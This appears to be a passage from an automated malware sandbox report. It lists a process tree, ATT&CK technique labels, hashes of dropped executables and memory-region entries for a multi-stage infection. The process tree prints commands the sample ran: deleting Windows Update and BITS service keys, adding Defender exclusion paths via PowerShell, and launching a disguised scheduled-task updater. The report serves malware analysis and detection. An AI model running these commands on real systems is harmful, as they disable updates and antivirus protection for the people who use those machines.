C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:1368

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:4828

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:2036

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:360

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
- Modifies security service
PID:4232

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:1536

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:3764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
1⤵
PID:3476

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
2⤵
PID:1252

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
PID:4596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4228

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
2KB

MD5
e825419f5d91cbb7dd2c1407c2ae4c08

SHA1
daca95b9bffaff1aacb09d09292a41c5e98f0d12

SHA256
01a7d3b0ef49c660185536f53cfa2744c7784aef0981df4fd03ae06770b25376

SHA512
e4c0b3dea86821de18a10f43dac1263cf917075b620cd4f6ca22331dec27ca0c89b57145e33de8f502e09c1bcfaa400d27cb601f315b1a8b4c851f15064fd514

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
1KB

MD5
0e8f1fb71254974e1d528b62e7b02e8b

SHA1
2275bdfb4779b15a886d9558ee3e0ce97112ddee

SHA256
f5e027fd76267c7668098a78724a82ca20ffb6818fc4e5b6eb9669866f32800c

SHA512
f084ae94658a9a8db6da8437cd8ad913e9820ff6f05f974ca165ee7af98a0cbf32e87fde1e263c9a7ec9d7877de44ee0ab1dd22269135a03a922d7dcc6473304

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
488B

MD5
723ff6691af4c4a941a5e0c7a6114395

SHA1
cd6d9b0e256118e58390fc6c2b8cb5ad94fae5dd

SHA256
10faa7eaa1dc0e7689c56469bf72e3e0c33d1c1864d62399de36a048223c4d90

SHA512
ba938408f146bfcaaff99e4c39e6f8e57fb8399ad4b289e60028917a3356b560bac34805996542d1a3520f71fb23069d048c5c4785e2e7bb9c70f19a4fe1d227

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
482B

MD5
49967e97a35f55ef3c383bee63dd7446

SHA1
61911a0a7eac441eb1be7fec6719582db17be468

SHA256
bfc959a4e8584e2dee3eb43dffd5a3bcdabeb48357fcad73877124820c982b98

SHA512
abc55d371461732430631965383612cbe046631a627bc07a2a040ba9a7c6afcb0e0819c8c1c25ee8b25cf18af84cffe99adcd1367d0390d1a6331020c4744911

Download Submit
C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe
Filesize
325KB

MD5
4c9fdfbf316f37dbcc7314e5641f9a9a

SHA1
7fa01df0e5420f9e5b69486550460e839fd0f3a3

SHA256
e661e53f429cd22e30ca6fb368f3e011e76264892f4e718c75cb3636f4f2e611

SHA512
b22c60d27ed5457677645a2b8669cd1958cc18a021e19dcf1d1a3a88ed63cd4eb749b1fe8798f651dcc5595d019ceb3cb38eae7a07ab73098eee502dbee5c32b

Download Submit
C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe
Filesize
325KB

MD5
4c9fdfbf316f37dbcc7314e5641f9a9a

SHA1
7fa01df0e5420f9e5b69486550460e839fd0f3a3

SHA256
e661e53f429cd22e30ca6fb368f3e011e76264892f4e718c75cb3636f4f2e611

SHA512
b22c60d27ed5457677645a2b8669cd1958cc18a021e19dcf1d1a3a88ed63cd4eb749b1fe8798f651dcc5595d019ceb3cb38eae7a07ab73098eee502dbee5c32b

Download Submit
C:\Users\Admin\AppData\Local\0cc92143-b526-4643-8ea1-4a756ad96577\build2.exe
Filesize
325KB

MD5
4c9fdfbf316f37dbcc7314e5641f9a9a

SHA1
7fa01df0e5420f9e5b69486550460e839fd0f3a3

SHA256
e661e53f429cd22e30ca6fb368f3e011e76264892f4e718c75cb3636f4f2e611

SHA512
b22c60d27ed5457677645a2b8669cd1958cc18a021e19dcf1d1a3a88ed63cd4eb749b1fe8798f651dcc5595d019ceb3cb38eae7a07ab73098eee502dbee5c32b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
527a9928cecda9d2298af8c230e09616

SHA1
2f532608be62f8ab209d3e4e73cbcd37105307fc

SHA256
fbe8557b69638d82318be932b227db8b5e1911d43d08300189f1ade1819e9cb4

SHA512
91bd4fd9c2157800fe46cc165fdf31fae4cfbde20252903c465869d8c97b9822bfddb40d98a0e1b42f869876286e3b526cdbde9e71d03c98eebce3ec3b8a9d33

Download Submit
C:\Users\Admin\AppData\Local\Temp\3E39.exe
Filesize
3.6MB

MD5
78255abafe880fe06814a482cf46ed1c

SHA1
1ce5db4f5a577913038d1b8cbb77c0f7175c12c3

SHA256
05332e9705079e823001559f605f11fd4e35eaf5514237ecf9c4f454eaa4af1b

SHA512
4eaf0eb5f40aab4a729761405edfcbf7a3fd71d0da619a5425f8b06676cd257698989d16381d4361d9b326bb3835feacc3633a4926adbeab1abd0ae748e4e73d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3E39.exe
Filesize
3.6MB

MD5
78255abafe880fe06814a482cf46ed1c

SHA1
1ce5db4f5a577913038d1b8cbb77c0f7175c12c3

SHA256
05332e9705079e823001559f605f11fd4e35eaf5514237ecf9c4f454eaa4af1b

SHA512
4eaf0eb5f40aab4a729761405edfcbf7a3fd71d0da619a5425f8b06676cd257698989d16381d4361d9b326bb3835feacc3633a4926adbeab1abd0ae748e4e73d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ABB6.exe
Filesize
274KB

MD5
422bae02b141829ff15435a9116e33f7

SHA1
c5521bdc6287df403cbbf89f282e810aa001ae49

SHA256
c02b287cfde7eeea78da65bb100f6d84a2ada656653234e3eaae732ddc4f607e

SHA512
a5133919d1f41db225418ea7bad7e28ef7985ebffc0e4f4b7f9b1f99cb804e7e6223af5d81519447764d2ae00498c6676e8cb8bfb957b124091dc7fbb1e82f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\ABB6.exe
Filesize
274KB

MD5
422bae02b141829ff15435a9116e33f7

SHA1
c5521bdc6287df403cbbf89f282e810aa001ae49

SHA256
c02b287cfde7eeea78da65bb100f6d84a2ada656653234e3eaae732ddc4f607e

SHA512
a5133919d1f41db225418ea7bad7e28ef7985ebffc0e4f4b7f9b1f99cb804e7e6223af5d81519447764d2ae00498c6676e8cb8bfb957b124091dc7fbb1e82f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\AC72.exe
Filesize
167KB

MD5
55e16eb22eb7bfcf7c2a23d059bab79b

SHA1
a305cf7212801a4152b2bf090d00d4c6197116a7

SHA256
51e484e9ce67cb9ca00e57aaf9a16bfc5a35d4bc9b909a7265b6db4e2ace0d97

SHA512
65c450e3362f698e365ecfb6cec0036e464f64392fc8052ae9a383752e7d1d7aceebe405b27703df6b7630a09cf149eb3a4cd5c7413f5b2d3334c0ad3ce27402

Download Submit
C:\Users\Admin\AppData\Local\Temp\AC72.exe
Filesize
167KB

MD5
55e16eb22eb7bfcf7c2a23d059bab79b

SHA1
a305cf7212801a4152b2bf090d00d4c6197116a7

SHA256
51e484e9ce67cb9ca00e57aaf9a16bfc5a35d4bc9b909a7265b6db4e2ace0d97

SHA512
65c450e3362f698e365ecfb6cec0036e464f64392fc8052ae9a383752e7d1d7aceebe405b27703df6b7630a09cf149eb3a4cd5c7413f5b2d3334c0ad3ce27402

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADCB.exe
Filesize
752KB

MD5
9bf6dc48051cb8e05bc7a59a9b341f9a

SHA1
e695846e897f2b00c723dea754fd514ac8e1546e

SHA256
b4af965d311a82415429ddbe9cfd8b778d29dd4bd7bca9c8ea2ec4942cfd975e

SHA512
da999796233d2cae6480e9c4afa889d7cc5ce882bee8565b896cd5a06d3bce64fce085025da0529ba0b7b873db80da4b291410f025d847ffd1b67ddae98eecc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADCB.exe
Filesize
752KB

MD5
9bf6dc48051cb8e05bc7a59a9b341f9a

SHA1
e695846e897f2b00c723dea754fd514ac8e1546e

SHA256
b4af965d311a82415429ddbe9cfd8b778d29dd4bd7bca9c8ea2ec4942cfd975e

SHA512
da999796233d2cae6480e9c4afa889d7cc5ce882bee8565b896cd5a06d3bce64fce085025da0529ba0b7b873db80da4b291410f025d847ffd1b67ddae98eecc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADCB.exe
Filesize
752KB

MD5
9bf6dc48051cb8e05bc7a59a9b341f9a

SHA1
e695846e897f2b00c723dea754fd514ac8e1546e

SHA256
b4af965d311a82415429ddbe9cfd8b778d29dd4bd7bca9c8ea2ec4942cfd975e

SHA512
da999796233d2cae6480e9c4afa889d7cc5ce882bee8565b896cd5a06d3bce64fce085025da0529ba0b7b873db80da4b291410f025d847ffd1b67ddae98eecc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADCB.exe
Filesize
752KB

MD5
9bf6dc48051cb8e05bc7a59a9b341f9a

SHA1
e695846e897f2b00c723dea754fd514ac8e1546e

SHA256
b4af965d311a82415429ddbe9cfd8b778d29dd4bd7bca9c8ea2ec4942cfd975e

SHA512
da999796233d2cae6480e9c4afa889d7cc5ce882bee8565b896cd5a06d3bce64fce085025da0529ba0b7b873db80da4b291410f025d847ffd1b67ddae98eecc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADCB.exe
Filesize
752KB

MD5
9bf6dc48051cb8e05bc7a59a9b341f9a

SHA1
e695846e897f2b00c723dea754fd514ac8e1546e

SHA256
b4af965d311a82415429ddbe9cfd8b778d29dd4bd7bca9c8ea2ec4942cfd975e

SHA512
da999796233d2cae6480e9c4afa889d7cc5ce882bee8565b896cd5a06d3bce64fce085025da0529ba0b7b873db80da4b291410f025d847ffd1b67ddae98eecc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\B231.exe
Filesize
190KB

MD5
d9915df95b82cd0243b48c7436ea5a25

SHA1
49b2cd629feaadf81d20c9a61db195ecf9baa4a1

SHA256
0e243c8a7213079e599895cd122e74c06f569a348efe0bf8bf55cac25543253d

SHA512
6b7191e817845bf6dc927e7e6cd782518b4ba8f97326668160e385dacd9b9eb1352d27e0b6c097d737cf8c9740244de1a8c62d1e9f5e0aaa9b79359c38143cde

Download Submit
C:\Users\Admin\AppData\Local\Temp\B231.exe
Filesize
190KB

MD5
d9915df95b82cd0243b48c7436ea5a25

SHA1
49b2cd629feaadf81d20c9a61db195ecf9baa4a1

SHA256
0e243c8a7213079e599895cd122e74c06f569a348efe0bf8bf55cac25543253d

SHA512
6b7191e817845bf6dc927e7e6cd782518b4ba8f97326668160e385dacd9b9eb1352d27e0b6c097d737cf8c9740244de1a8c62d1e9f5e0aaa9b79359c38143cde

Download Submit
C:\Users\Admin\AppData\Local\Temp\B4C2.exe
Filesize
206KB

MD5
39d1b58883462266615e7fcd9c0776ff

SHA1
a158d6e364df331dc2f34be4d64a6ddcc0f46548

SHA256
8079144d9c35d6ad748fc7ff634a8e0d9704e54ccff85812e55a4555468d0662

SHA512
dbf088ddc611dd620c2c9b2f422938fd133b71bd270b2256cb39b6587f7a786a441fd36cde032e1daebd13e1b1fb9b356f7a5009f4f318f034918ce0699ca596

Download Submit
C:\Users\Admin\AppData\Local\Temp\B4C2.exe
Filesize
206KB

MD5
39d1b58883462266615e7fcd9c0776ff

SHA1
a158d6e364df331dc2f34be4d64a6ddcc0f46548

SHA256
8079144d9c35d6ad748fc7ff634a8e0d9704e54ccff85812e55a4555468d0662

SHA512
dbf088ddc611dd620c2c9b2f422938fd133b71bd270b2256cb39b6587f7a786a441fd36cde032e1daebd13e1b1fb9b356f7a5009f4f318f034918ce0699ca596

Download Submit
C:\Users\Admin\AppData\Local\Temp\C01D.exe
Filesize
7.5MB

MD5
52f4f9797fbb76785a1b8cf695e65a15

SHA1
32deadcec14dca90fe14030f69097f8bd6d98b95

SHA256
1ea28978334fa03b2714b5c22abd580cdd8b5b0a6fcdf895fe1367ac96da0e8b

SHA512
3c32798f1dae91d17ea4ca32aa153dd064e6d2dfe7acd98079edb1182f16b287a76ea621aa01b08019d10cac771c8d16db555f96fd4b0b6e0bcd528010a64e84

Download Submit
C:\Users\Admin\AppData\Local\Temp\C01D.exe
Filesize
7.5MB

MD5
52f4f9797fbb76785a1b8cf695e65a15

SHA1
32deadcec14dca90fe14030f69097f8bd6d98b95

SHA256
1ea28978334fa03b2714b5c22abd580cdd8b5b0a6fcdf895fe1367ac96da0e8b

SHA512
3c32798f1dae91d17ea4ca32aa153dd064e6d2dfe7acd98079edb1182f16b287a76ea621aa01b08019d10cac771c8d16db555f96fd4b0b6e0bcd528010a64e84

Download Submit
C:\Users\Admin\AppData\Local\Temp\D201.exe
Filesize
7.5MB

MD5
52f4f9797fbb76785a1b8cf695e65a15

SHA1
32deadcec14dca90fe14030f69097f8bd6d98b95

SHA256
1ea28978334fa03b2714b5c22abd580cdd8b5b0a6fcdf895fe1367ac96da0e8b

SHA512
3c32798f1dae91d17ea4ca32aa153dd064e6d2dfe7acd98079edb1182f16b287a76ea621aa01b08019d10cac771c8d16db555f96fd4b0b6e0bcd528010a64e84

Download Submit
C:\Users\Admin\AppData\Local\Temp\D201.exe
Filesize
7.5MB

MD5
52f4f9797fbb76785a1b8cf695e65a15

SHA1
32deadcec14dca90fe14030f69097f8bd6d98b95

SHA256
1ea28978334fa03b2714b5c22abd580cdd8b5b0a6fcdf895fe1367ac96da0e8b

SHA512
3c32798f1dae91d17ea4ca32aa153dd064e6d2dfe7acd98079edb1182f16b287a76ea621aa01b08019d10cac771c8d16db555f96fd4b0b6e0bcd528010a64e84

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dat
Filesize
557KB

MD5
30d5f615722d12fdda4f378048221909

SHA1
e94e3e3a6fae8b29f0f80128761ad1b69304a7eb

SHA256
b7cb464cd0c61026ec38d89c0a041393bc9369e217303677551eec65a09d2628

SHA512
a561a224d7228ec531a966c7dbd6bc88138e2f4a1c8112e5950644f69bf3a43b1e87e03bc1b4fd5e9ca071b5a9353b18697573404602ccd51f2946faf95144c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\liyy.exe
Filesize
312KB

MD5
1310b14202d951cfeb5a37256cb577f1

SHA1
8372ad9ceaf4f386bee6f28d2686f44598b0e422

SHA256
2658e2d285ffb7dbc4d084728bcb65a537fefe900eeb07a10b42f3c61291ce2c

SHA512
f4a56b74e660b4683fd61e90528a65804053c84501af1735a12171a097b9a368538aee99d9338208407a1060a47ee532c5bfc2f479b0034debcf7559a757a79e

Download Submit
C:\Users\Admin\AppData\Local\Temp\liyy.exe
Filesize
312KB

MD5
1310b14202d951cfeb5a37256cb577f1

SHA1
8372ad9ceaf4f386bee6f28d2686f44598b0e422

SHA256
2658e2d285ffb7dbc4d084728bcb65a537fefe900eeb07a10b42f3c61291ce2c

SHA512
f4a56b74e660b4683fd61e90528a65804053c84501af1735a12171a097b9a368538aee99d9338208407a1060a47ee532c5bfc2f479b0034debcf7559a757a79e

Download Submit
C:\Users\Admin\AppData\Local\Temp\liyy.exe
Filesize
312KB

MD5
1310b14202d951cfeb5a37256cb577f1

SHA1
8372ad9ceaf4f386bee6f28d2686f44598b0e422

SHA256
2658e2d285ffb7dbc4d084728bcb65a537fefe900eeb07a10b42f3c61291ce2c

SHA512
f4a56b74e660b4683fd61e90528a65804053c84501af1735a12171a097b9a368538aee99d9338208407a1060a47ee532c5bfc2f479b0034debcf7559a757a79e

Download Submit
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe
Filesize
3.5MB

MD5
61f42ae7c6cd1248603f3b08945531d8

SHA1
760a9f9d637162f32067e26ffe09c0c3a6e03796

SHA256
5e616003629c8604e0345f7ffb0902c641438ea73ad692cf1e2100e5560a6e0c

SHA512
cb5195c2812aa8399a94b9612831622b88e180f0f08c6e93dca0ff9279bde029d129cac43ccfe4aada61ac974839d93bff6869db2a8470db1c5131e9626ed4dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe
Filesize
3.5MB

MD5
61f42ae7c6cd1248603f3b08945531d8

SHA1
760a9f9d637162f32067e26ffe09c0c3a6e03796

SHA256
5e616003629c8604e0345f7ffb0902c641438ea73ad692cf1e2100e5560a6e0c

SHA512
cb5195c2812aa8399a94b9612831622b88e180f0f08c6e93dca0ff9279bde029d129cac43ccfe4aada61ac974839d93bff6869db2a8470db1c5131e9626ed4dd

Download Submit
C:\Users\Admin\AppData\Local\e48e4a34-7f98-440a-b754-89e0be4363ce\ADCB.exe
Filesize
752KB

MD5
9bf6dc48051cb8e05bc7a59a9b341f9a

SHA1
e695846e897f2b00c723dea754fd514ac8e1546e

SHA256
b4af965d311a82415429ddbe9cfd8b778d29dd4bd7bca9c8ea2ec4942cfd975e

SHA512
da999796233d2cae6480e9c4afa889d7cc5ce882bee8565b896cd5a06d3bce64fce085025da0529ba0b7b873db80da4b291410f025d847ffd1b67ddae98eecc3

Download Submit
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
Filesize
636.7MB

MD5
a748f1df6b9f089adaf93cbff23f0c37

SHA1
7224434a56334782a4edefb5c7214ccbb9a35ff6

SHA256
1d4ba5d755ad0dd596aa027d4f39b40778054ed38e3813d54030f7e579ff0018

SHA512
982343772b89a92134bf1b71ea267331af13e22d17b29349c3cd6e25bf6035d6efce4166571b7413bf76c041976cd2ceca50c2df8bc9aac942ba42f5346c56d8

Download Submit
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
Filesize
641.5MB

MD5
3023e05e50d2654a1db8cf3ddd4eebb5

SHA1
362ee5f3cf1ea959d6c70b00232bc00d897447c2

SHA256
b11d188ebd26e36340844800875bd0538f220cc01144f546e9cc00a39a5bc3c9

SHA512
278daf10849154d4d11043e4f976f79dc740a547adf654b2f8931010c55e05682d8c8effcf9007bff1272972d8df35c2f62edfc8ab940e5052d42960344df879

Download Submit
memory/224-212-0x0000000000000000-mapping.dmp

Download
memory/224-228-0x000000000072B000-0x00000000007BC000-memory.dmp

Filesize
580KB

Download
memory/360-302-0x0000000000000000-mapping.dmp

Download
memory/372-162-0x0000000000000000-mapping.dmp

Download
memory/372-166-0x0000000000270000-0x00000000009F8000-memory.dmp

Filesize
7.5MB

Download
memory/384-285-0x0000000000400000-0x0000000000575000-memory.dmp

Filesize
1.5MB

Download
memory/384-284-0x0000000000758000-0x0000000000781000-memory.dmp

Filesize
164KB

Download
memory/384-311-0x0000000000758000-0x0000000000781000-memory.dmp

Filesize
164KB

Download
memory/480-272-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/480-234-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/480-229-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/480-227-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/480-224-0x0000000000000000-mapping.dmp

Download
memory/912-190-0x0000000000000000-mapping.dmp

Download
memory/1252-310-0x0000000000000000-mapping.dmp

Download
memory/1368-299-0x0000000000000000-mapping.dmp

Download
memory/1392-174-0x0000000000000000-mapping.dmp

Download
memory/1536-135-0x0000000000400000-0x0000000000564000-memory.dmp

Filesize
1.4MB

Download
memory/1536-132-0x00000000005F1000-0x0000000000604000-memory.dmp

Filesize
76KB

Download
memory/1536-134-0x0000000000400000-0x0000000000564000-memory.dmp

Filesize
1.4MB

Download
memory/1536-133-0x00000000005B0000-0x00000000005B9000-memory.dmp

Filesize
36KB

Download
memory/1536-304-0x0000000000000000-mapping.dmp

Download
memory/1580-193-0x0000000000000000-mapping.dmp

Download
memory/1580-292-0x0000000000000000-mapping.dmp

Download
memory/1768-274-0x0000000000400000-0x0000000000472000-memory.dmp

Filesize
456KB

Download
memory/1768-242-0x0000000000000000-mapping.dmp

Download
memory/1768-243-0x0000000000400000-0x0000000000472000-memory.dmp

Filesize
456KB

Download
memory/1768-245-0x0000000000400000-0x0000000000472000-memory.dmp

Filesize
456KB

Download
memory/1768-246-0x0000000000400000-0x0000000000472000-memory.dmp

Filesize
456KB

Download
memory/1768-249-0x0000000000400000-0x0000000000472000-memory.dmp

Filesize
456KB

Download
memory/1768-250-0x0000000050AD0000-0x0000000050BC3000-memory.dmp

Filesize
972KB

Download
memory/1844-172-0x0000000000000000-mapping.dmp

Download
memory/2036-301-0x0000000000000000-mapping.dmp

Download
memory/2572-319-0x0000000000AA0000-0x0000000000AB0000-memory.dmp

Filesize
64KB

Download
memory/2572-337-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-211-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-321-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-218-0x0000000007EB0000-0x0000000007EC0000-memory.dmp

Filesize
64KB

Download
memory/2572-210-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-221-0x0000000007EB0000-0x0000000007EC0000-memory.dmp

Filesize
64KB

Download
memory/2572-208-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-322-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-217-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-209-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-323-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-207-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-325-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-329-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-206-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-205-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-327-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-332-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-331-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-333-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-204-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-334-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-318-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-313-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-203-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-314-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-202-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-201-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-315-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-199-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-200-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-198-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-197-0x0000000007520000-0x0000000007530000-memory.dmp

Filesize
64KB

Download
memory/2572-196-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-194-0x0000000002A90000-0x0000000002AA0000-memory.dmp

Filesize
64KB

Download
memory/2572-338-0x0000000000AB0000-0x0000000000AC0000-memory.dmp

Filesize
64KB

Download
memory/2572-340-0x0000000000AA0000-0x0000000000AB0000-memory.dmp

Filesize
64KB

Download
memory/2572-271-0x0000000007EB0000-0x0000000007EC0000-memory.dmp

